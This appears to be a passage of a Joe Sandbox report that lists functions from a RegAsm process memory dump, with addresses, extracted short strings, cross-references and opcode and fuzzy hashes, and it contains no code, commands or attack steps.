Opcode Fuzzy Hash: 685b0eab73d45fe6766972de414d355aecf0d4d749a3e166455b2a9a6706c085
Instruction Fuzzy Hash: 1E319DB49182408FDB00EF79E98561DBBF0BB89304F11892DE498DB361D774A958CF86

Function 00426D6F Relevance: 4.5, Strings: 3, Instructions: 742COMMON

Download Yara Rule

Strings

KJML, xrefs: 00427368
!6, xrefs: 00426E7F
J[, xrefs: 00426E97

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: !6$J[$KJML
API String ID: 0-3728117715
Opcode ID: 8abb31946a3727c284634766d95644f54f309af86dd5d5221ada2c424e40996c
Instruction ID: 2a25dcf092121437f70d10bafa5ed34f364bcf50a3894fec681a7a5b2b557070
Opcode Fuzzy Hash: 8abb31946a3727c284634766d95644f54f309af86dd5d5221ada2c424e40996c
Instruction Fuzzy Hash: 6742CF75618352DFD714DF28E890A2AB7E1FF89306F49893DE88587392D738E850CB49

Function 004313A6 Relevance: 4.3, Strings: 3, Instructions: 583COMMON

Download Yara Rule

Strings

;40&, xrefs: 004318B0
0<)), xrefs: 004318B7
??8:, xrefs: 004318A9

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 0<))$;40&$??8:
API String ID: 0-1871281168
Opcode ID: bb6ced92a76976bc0f6e71e20fadc19b4c1d3bf0cce70c7e2194d211575c0c01
Instruction ID: 3172d921e78812b1c050acba91b436dc1560753df1098f0e0238a6ec08d5474b
Opcode Fuzzy Hash: bb6ced92a76976bc0f6e71e20fadc19b4c1d3bf0cce70c7e2194d211575c0c01
Instruction Fuzzy Hash: 33223CB48047809FD721EF29C142612BFB0AF16304F149A9ED8EA4F756D335E41ACFA6

Function 0042D4B0 Relevance: 4.2, Strings: 3, Instructions: 469COMMON

Download Yara Rule

Strings

4`[b, xrefs: 0042DAE0
x~, xrefs: 0042D56C
@A, xrefs: 0042D8F6

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 4`[b$@A$x~
API String ID: 0-2557465156
Opcode ID: 073005090305d545b1cbc3f2214bbd6cd078a91ecc16a1324ff3c88742bb796a
Instruction ID: 71ce8913d7d35e2993ed1d7f5b34bd7b3a43d49ef706b87aeae4491ce3041307
Opcode Fuzzy Hash: 073005090305d545b1cbc3f2214bbd6cd078a91ecc16a1324ff3c88742bb796a
Instruction Fuzzy Hash: E0F187746083819BD310DF54E890A1FFBF1AB85345F50882DF4C89B2A2D778D985CB9A

Function 004082A0 Relevance: 4.2, Strings: 3, Instructions: 420COMMON

Download Yara Rule

Strings

), xrefs: 0040831C
IEND, xrefs: 0040870C
), xrefs: 00408326

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: )$)$IEND
API String ID: 0-588110143
Opcode ID: 0f7cc03fbb55a4edfdd198c7181f1ea2cdd4309acdaaebf3709f1e139417a415
Instruction ID: 83a183775cdd398927d68012447a0dde67a4d25f4dbae856c59ba0330ac27543
Opcode Fuzzy Hash: 0f7cc03fbb55a4edfdd198c7181f1ea2cdd4309acdaaebf3709f1e139417a415
Instruction Fuzzy Hash: D6F1B071A087019BE314DF28C88571BBBE0BB95314F144A3EE995A73C1DB79E914CBCA

Function 00445643 Relevance: 3.8, Strings: 3, Instructions: 72COMMON

Download Yara Rule

Strings

%*, xrefs: 004456B0
3<, xrefs: 004456B7
:*, xrefs: 004456BE

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: %*$3<$:*
API String ID: 0-1794941600
Opcode ID: 37c0f990a05873117df136335eaf1b53f4f50d15036727b40a038832b769ff6e
Instruction ID: aab5561eedbb3972e5759fa3252ad924d383d29413a1e46feb6a5c27c627f847
Opcode Fuzzy Hash: 37c0f990a05873117df136335eaf1b53f4f50d15036727b40a038832b769ff6e
Instruction Fuzzy Hash: CF21F5B6D007419FDB11DF65FC8052EBBB2AF15309F54446DE085A7263D734DA04CBAA

Function 0041D1CC Relevance: 3.1, Strings: 2, Instructions: 637COMMON

Download Yara Rule

Strings

4`[b, xrefs: 0041D7E0
4`[b, xrefs: 0041D8B0

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 4`[b$4`[b
API String ID: 0-3640500014
Opcode ID: d5917c9b9d8350f3beb215bd5d8f9cbab930d6248480d37619cee77ce1b37d2b
Instruction ID: 12a80d30757b39ce965187c26aedd0054ae26030b4092d981c5a7fbdf15fc6cd
Opcode Fuzzy Hash: d5917c9b9d8350f3beb215bd5d8f9cbab930d6248480d37619cee77ce1b37d2b
Instruction Fuzzy Hash: D9128AB4600B019FD7249F24C881BA3B7F1FF4A305F14892ED4968BB51E739B895CB98

Function 00413E12 Relevance: 3.0, Strings: 2, Instructions: 487COMMON

Download Yara Rule

Strings

&, xrefs: 004142C0
pAA, xrefs: 0041414C

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: &$pAA
API String ID: 0-465269442
Opcode ID: f9196285db1c2b1127061fd708780623d171e5f0f70249608e66ea73976e410d
Instruction ID: 9a3263a6cd5681526376c4214b88087064958140d7f445b17b052180b7fa6ec6
Opcode Fuzzy Hash: f9196285db1c2b1127061fd708780623d171e5f0f70249608e66ea73976e410d
Instruction Fuzzy Hash: F1F1C0B19083019BC710DF28D88065FBBF1EF96348F14482EF585973A1E73AD985CB4A

Function 00403660 Relevance: 2.9, Strings: 2, Instructions: 419COMMON

Download Yara Rule

Strings

NaN, xrefs: 004036BE
Inf, xrefs: 004036B7

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: Inf$NaN
API String ID: 0-3500518849
Opcode ID: 34741a97254cca60cdf124d19751835b0456ddc72c0aa204760701693f181364
Instruction ID: 9f6e1609bf5ae3c939bd6f7d3d1e83053a0e02d0ae6046eec7f82b72232bd5e1
Opcode Fuzzy Hash: 34741a97254cca60cdf124d19751835b0456ddc72c0aa204760701693f181364
Instruction Fuzzy Hash: 25D1D8B2A183019BC704CF29C88061BBBE5EBC4751F258A3EF895A73D0E775DD458B86

Function 00409442 Relevance: 2.9, Strings: 2, Instructions: 404COMMON

Download Yara Rule

Strings

0, xrefs: 00409798
8, xrefs: 00409790

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: 487e8e5503fc753536f2b589286d07810250f4190d30f8b03a4b485db3e395b3
Instruction ID: c85003599182c64deaf94edeb78d34fa1772c28eaf23bdad4ca749f7a16dacfb
Opcode Fuzzy Hash: 487e8e5503fc753536f2b589286d07810250f4190d30f8b03a4b485db3e395b3
Instruction Fuzzy Hash: D3025435209380EFD744CF29D880A8ABBF1BF9A304F49886DF98887362D375D955CB56

Function 00409269 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

0, xrefs: 00409798
8, xrefs: 00409790

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: 8e40a435cd7dba42a333ad6edde212d45be7a34a2a928684b85601fa1d971ce9
Instruction ID: d53cd1ae9a89fc06510ae64533198426cc7ad23e7e444a7287cf69d98f7a29b3
Opcode Fuzzy Hash: 8e40a435cd7dba42a333ad6edde212d45be7a34a2a928684b85601fa1d971ce9
Instruction Fuzzy Hash: ABE14375209380EFD754CF29D880A4ABBF1BF9A304F49886CF98887392C775D955CB92

Function 004153E5 Relevance: 2.8, Strings: 2, Instructions: 284COMMON

Download Yara Rule

Strings

f, xrefs: 004155F3
G, xrefs: 004153E5

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: G$f
API String ID: 0-3568688445
Opcode ID: a3ab0d2a502cf9106bb1aae3365b7da690da5bf7a0c62a3cd38cbde2f1fff53a
Instruction ID: 877b337062b1dc3f477628eebd9f265be636e1b3d7748023da3c56bbf5271b67
Opcode Fuzzy Hash: a3ab0d2a502cf9106bb1aae3365b7da690da5bf7a0c62a3cd38cbde2f1fff53a
Instruction Fuzzy Hash: 01A1F674508341AAD3109B18D485B9FFFF1EFD6394F54881EF58897262E33AD884CB5A

Function 00436560 Relevance: 2.8, Strings: 2, Instructions: 270COMMON

Download Yara Rule

Strings

000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F8081, xrefs: 00436802
0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 004367ED

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F8081$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
API String ID: 0-423013716
Opcode ID: 7253c76481f33b098a2e10bccb67d40fc3a086e792de9899d840be045cd895e3
Instruction ID: 220d6d31cb5a513c44074931160bcf69eb2b159beb9c0f2167700cfe38dabb36
Opcode Fuzzy Hash: 7253c76481f33b098a2e10bccb67d40fc3a086e792de9899d840be045cd895e3
Instruction Fuzzy Hash: A0914836E095925BCB199E3C8C513B97A925B5F330F3ED37BD8B19B3D5C22948028369

Function 0042E7F6 Relevance: 2.6, Strings: 2, Instructions: 72COMMON

Download Yara Rule

Strings

'M, xrefs: 0042E820
b, xrefs: 0042E827

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 'M$b
API String ID: 0-918009818
Opcode ID: 2aed94cd68272353eaa7926337b26d923203a4ea1e1e923335ff6a154fc774ce
Instruction ID: 1eb4dd26338a116d3a02ef21deea54923209418d33dba73ba1f9f06d3624bc32
Opcode Fuzzy Hash: 2aed94cd68272353eaa7926337b26d923203a4ea1e1e923335ff6a154fc774ce
Instruction Fuzzy Hash: D411817060C3908BC311EF16A09062BFBE5AF82705F680C5EE5D19B302C37AC9198B6B

Function 00412D20 Relevance: 2.1, Strings: 1, Instructions: 866COMMON

Download Yara Rule

Strings

ku, xrefs: 0041357D

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: ku
API String ID: 0-3888063776
Opcode ID: 3fdf127da7069fa47e7b38ab17b01e00c79b8925519393abf646223ceba5f871
Instruction ID: fc4d39177779672566225db54df6da41b44001f0f112bd7ad3de96eb399ccf6b
Opcode Fuzzy Hash: 3fdf127da7069fa47e7b38ab17b01e00c79b8925519393abf646223ceba5f871
Instruction Fuzzy Hash: 2042B0719083019BD710DF28D88065FBFF4EF86358F14482EF58997262E739D985CB9A

Function 0041FD80 Relevance: 2.0, Strings: 1, Instructions: 705COMMON

Download Yara Rule

Strings

+*), xrefs: 00420583, 0042058B

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: +*)
API String ID: 0-1463337533
Opcode ID: 6376dd04eb4d4f38e522e2b32bcb2e79d8f3c61078d1b186782db861d1327d09
Instruction ID: ac801d31a26a3995267328474ff1f26110edfa6b5badc64f71841a4a04965ee2
Opcode Fuzzy Hash: 6376dd04eb4d4f38e522e2b32bcb2e79d8f3c61078d1b186782db861d1327d09
Instruction Fuzzy Hash: 602299B45083509BD300AF58E881A6FBBF0EF96744F44891DE4C49B3A2D379D944CBAB

Function 00443B90 Relevance: 1.8, Strings: 1, Instructions: 575COMMON

Download Yara Rule

Strings

f, xrefs: 00443D58

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: f
API String ID: 0-1993550816
Opcode ID: e040c5057a3f72cd900cf1fe2fb5ff4faa927d87cbee2c36149412e56dde13ef
Instruction ID: 02c3e65df5dc82e77de20384eefab9ec62934292274990bd2c401de9fd9cb8ca
Opcode Fuzzy Hash: e040c5057a3f72cd900cf1fe2fb5ff4faa927d87cbee2c36149412e56dde13ef
Instruction Fuzzy Hash: AC12AC715083409FE714CF18C880B2FBBE5BB89719F188A2EF5959B391D739DA04CB96

Function 00404DB0 Relevance: 1.8, Strings: 1, Instructions: 558COMMON

Download Yara Rule

Strings

%1.17g, xrefs: 00405170

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: %1.17g
API String ID: 0-1551345525
Opcode ID: aa9f1a21c995dff2338998c3e63092040a1ae2211e0ebbc115654cb93b89609f
Instruction ID: 6408a4430cc46c3a6ef511aa180ff04010dd97372e51880bce6f64ef2deecd4d
Opcode Fuzzy Hash: aa9f1a21c995dff2338998c3e63092040a1ae2211e0ebbc115654cb93b89609f
Instruction Fuzzy Hash: AB12F875A08B418BD7158E18844032BBBE2EFE1304F19857FD895AB3C1E7B9DC45CB8A

Function 00425EF0 Relevance: 1.8, APIs: 1, Instructions: 259comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0044CB80,00000000,00000001,0044CB70), ref: 00425F19

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 8e4d19bf807ef0195fa8bceccf05a9af39792f6acccdeb64a95ca69e6c9b1448
Instruction ID: 24ee66b28e91cc2c8977140821d827580296eb0a0c3a1e65ec68243aab2125ab
Opcode Fuzzy Hash: 8e4d19bf807ef0195fa8bceccf05a9af39792f6acccdeb64a95ca69e6c9b1448
Instruction Fuzzy Hash: 2D61DCB17002219BDB209F64DC92B7773A8EF85314F09452DF98ACB291F779E840C76A

Function 00447D70 Relevance: 1.7, Strings: 1, Instructions: 407COMMON

Download Yara Rule

Strings

P, xrefs: 00447F13

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: P
API String ID: 0-3110715001
Opcode ID: c20880023a5c27023bee3f1247dd408a660cdaf958e019c7c0263b056b29c3b8
Instruction ID: a6c4e31680c5805766badd30ffe1e12194a7ce8dfeb74f8f89fe91fa79627422
Opcode Fuzzy Hash: c20880023a5c27023bee3f1247dd408a660cdaf958e019c7c0263b056b29c3b8
Instruction Fuzzy Hash: 18D1D67290C2604FD725CE18989071FB6E1EBC5718F168A3DE8A5AB380DB79DC46C7C5

Function 0042FD10 Relevance: 1.6, Strings: 1, Instructions: 396COMMON

Download Yara Rule

Strings

", xrefs: 0042FFF8

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 784b5130c64c8c48357e978bc1772135aee257f53ddad6a8b07dd3f41cbacca3
Instruction ID: 8a869f11ebd8bbb994c18ceb502fc588c1dfcb42bf542e4d653c0931b03b5454
Opcode Fuzzy Hash: 784b5130c64c8c48357e978bc1772135aee257f53ddad6a8b07dd3f41cbacca3
Instruction Fuzzy Hash: C7C136B2B043119BD7158E24D49076BB7F5AF85314F998A3FE89987382E73CDC098786

Function 00415081 Relevance: 1.6, Strings: 1, Instructions: 352COMMON

Download Yara Rule

Strings

rMA, xrefs: 00415065

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: AllocateHeap
String ID: rMA
API String ID: 1279760036-3963102562
Opcode ID: afd3db6b1d9c71f6c1a9615515b1e9b1ebc32e34958f437114d1f46ae9a93a8a
Instruction ID: 61801b64b76c2e54a6415a8b4b0c096645e279bd43305c8829362a52495bd3de
Opcode Fuzzy Hash: afd3db6b1d9c71f6c1a9615515b1e9b1ebc32e34958f437114d1f46ae9a93a8a
Instruction Fuzzy Hash: 92C1CF75608312CBC714CF18C880AABB7F2FFD9714F19856EE485873A5E7389991CB46

Function 0043F2AC Relevance: 1.5, Strings: 1, Instructions: 296COMMON

Download Yara Rule

Strings

4`[b, xrefs: 0043F4A0

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 4`[b
API String ID: 0-3962175265
Opcode ID: 0b881855c6a97d7c5a77e23d3980c573fcc28612c0004cb89a9f9d7cf5a33e6f
Instruction ID: 4dd198a39bd733c52ebde65f0b5763d0f106c2a07d20f822aa20662818375c1a
Opcode Fuzzy Hash: 0b881855c6a97d7c5a77e23d3980c573fcc28612c0004cb89a9f9d7cf5a33e6f
Instruction Fuzzy Hash: 3991EE72A04215CFDB14CFA8D8907AFB7B1FB89306F14883EE51697292D379D905CB54

Function 004483F0 Relevance: 1.5, Strings: 1, Instructions: 295COMMON

Download Yara Rule

Strings

Pabc, xrefs: 0044856B

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: Pabc
API String ID: 0-539773038
Opcode ID: fa7c04be828a2432081a9e7be923ec4345e1aab41b16938aee436436347d590f
Instruction ID: aef4fcaa6a85ae55d130a5bc648f57aba88fd5ce1a65361f3b5a042c6c7bf656
Opcode Fuzzy Hash: fa7c04be828a2432081a9e7be923ec4345e1aab41b16938aee436436347d590f
Instruction Fuzzy Hash: A391F2B5A08202CFDB04CF58D99066EB7B1FF89352F19486DD885A7351C374EE10CBA6

Function 004474C0 Relevance: 1.5, Strings: 1, Instructions: 288COMMON

Download Yara Rule

Strings

4`[b, xrefs: 004476E0

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: 4`[b
API String ID: 2994545307-3962175265
Opcode ID: eca3f27e3da1e6f9015881f4dcf11376f86e9a452c8b60de597b953f4acec9b1
Instruction ID: 09b9f34eb052b01ba082ac6d7aef20cb2f33ccc2ba28b49ca2baec844bbe62bd
Opcode Fuzzy Hash: eca3f27e3da1e6f9015881f4dcf11376f86e9a452c8b60de597b953f4acec9b1
Instruction Fuzzy Hash: B6A1AD7160C341ABE720DB19C881B6FBBE1EB89355F548C2EF58497352E734E841CB9A

Function 0040A5E0 Relevance: 1.5, Strings: 1, Instructions: 265COMMON

Download Yara Rule

Strings

,, xrefs: 0040A716

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: 01370542caca945275851bd7bfa07fb1c17fe8eabd9dc99765752226d25a693f
Instruction ID: 55c96e82a7869d88ec217973629b8deeff250cc7d79933e2d00e486926a8c7d9
Opcode Fuzzy Hash: 01370542caca945275851bd7bfa07fb1c17fe8eabd9dc99765752226d25a693f
Instruction Fuzzy Hash: A5B13A711093819FD321DF18C88061BFBE0AFA9704F488E2DE5D997782D635E918CBA7

Function 0042F5D0 Relevance: 1.5, Strings: 1, Instructions: 253COMMON

Download Yara Rule

Strings

", xrefs: 0042F836

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 57fd4449aa32aaf9c518165ed4b054b0807d9bc42b656f856b1c71475467dfc6
Instruction ID: 0bb2159ff0f0aae890ba678f7f631fc362358c0ce6aef23b65b5806ee1124400
Opcode Fuzzy Hash: 57fd4449aa32aaf9c518165ed4b054b0807d9bc42b656f856b1c71475467dfc6
Instruction Fuzzy Hash: 3671ED32B047314BD7249D6DA98021BB6E3ABC5730FD9C77AE8648B3E5D7788C0A4749

Function 004362B0 Relevance: 1.5, Strings: 1, Instructions: 244COMMON

Download Yara Rule

Strings

0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 00436389

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
API String ID: 0-442858466
Opcode ID: 83a08048a6e46e9e2b9576638f472dc4e4c161d428f535f792cd550b56cb5fc5
Instruction ID: 6b73f231b8c2899efd31550edadb09dcd8ae747ab8f6d8b12bd2ef0adb89132c
Opcode Fuzzy Hash: 83a08048a6e46e9e2b9576638f472dc4e4c161d428f535f792cd550b56cb5fc5
Instruction Fuzzy Hash: 7C712537B155926BC7248E7C4C412AAAA531BEA334B3FD377DC719B3D5C6298C024395

Function 004378C0 Relevance: 1.5, Strings: 1, Instructions: 242COMMON

Download Yara Rule

Strings

0, xrefs: 0043791B

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: f3dcf3ce66a0237ef4315a7f533f402efff159f98205964269ad886de511a010
Instruction ID: 13f26a4241b994f0b92ad71affdc70fcf37ed744033f513335e096c96ae73cf8
Opcode Fuzzy Hash: f3dcf3ce66a0237ef4315a7f533f402efff159f98205964269ad886de511a010
Instruction Fuzzy Hash: 05717777B0DA9047D328597C4C523B96A934B9A334F2DD3BEE9F18B3E1C52C49068249

Function 004472C0 Relevance: 1.4, Strings: 1, Instructions: 183COMMON

Download Yara Rule

Strings

4`[b, xrefs: 00447480

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 4`[b
API String ID: 0-3962175265
Opcode ID: ee26ac0454014b8dbd70989fcf6e4ce1e80dad31d5681ba4f038ae1f6afbae8a
Instruction ID: 8ec4acbdec72fe2b7a16d44514e064f317dc58c936fdbb19920c26003c37d9a3
Opcode Fuzzy Hash: ee26ac0454014b8dbd70989fcf6e4ce1e80dad31d5681ba4f038ae1f6afbae8a
Instruction Fuzzy Hash: BE51D33160C2109BE7149E19CC90B2EBBE1EF85719F248A2DE9D55B392C739DC11C7AA

Function 00449A10 Relevance: 1.4, Strings: 1, Instructions: 119COMMON

Download Yara Rule

Strings

@, xrefs: 00449A90

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: 7ea6179726910335d31d38e1c0b5ac9b7918f51674ab7a8ef1577102009c116e
Instruction ID: 4e80274fb9a3a095fb5014997246bd1c6b51eafc0e42ba671f9ab8c5bff91032
Opcode Fuzzy Hash: 7ea6179726910335d31d38e1c0b5ac9b7918f51674ab7a8ef1577102009c116e
Instruction Fuzzy Hash: D931AE719083448BE314DF18D840A1FBBE5FFC9319F14C92DE58897241D779A908CB9A

Function 0042C5E3 Relevance: 1.3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

Strings

3<<3, xrefs: 0042C68A

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 3<<3
API String ID: 0-579374158
Opcode ID: a440403e9eff1357533c6402479118ab43cf603dddb0caae0cfa7bc94ace8b0f
Instruction ID: 8e956f948da48dc9f1c80ce0d7815a79e6ceb87f8755f9f8201be415072e1251
Opcode Fuzzy Hash: a440403e9eff1357533c6402479118ab43cf603dddb0caae0cfa7bc94ace8b0f
Instruction Fuzzy Hash: 6E31BC7440C390CFD324DF65E894B1FBBE0AF89305F464AADE1849B262DBB4C900CB96

Function 0040BC60 Relevance: .8, Instructions: 839COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a61cf8f9557713318e1927bc6a82629a140bba5c72cb8e1fc4a54313479d097
Instruction ID: 7aef5516330c16faf0c0e219547b9ca1f62e5a0c33f988676078ef9afd16876e
Opcode Fuzzy Hash: 3a61cf8f9557713318e1927bc6a82629a140bba5c72cb8e1fc4a54313479d097
Instruction Fuzzy Hash: 7452A231618311CBC725DF18D48026BB3E2FFD4314F298A3ED996A7385D739A855CB8A

Function 0040B150 Relevance: .7, Instructions: 670COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61c962738f6f5a3e3081c00ac1b01727c29e756136dbd0a8250a359abaf8a384
Instruction ID: 314f4cd21fe8e67b5289b78dcad843c0a4f505951129d3f57cfb3cc2c1067db8
Opcode Fuzzy Hash: 61c962738f6f5a3e3081c00ac1b01727c29e756136dbd0a8250a359abaf8a384
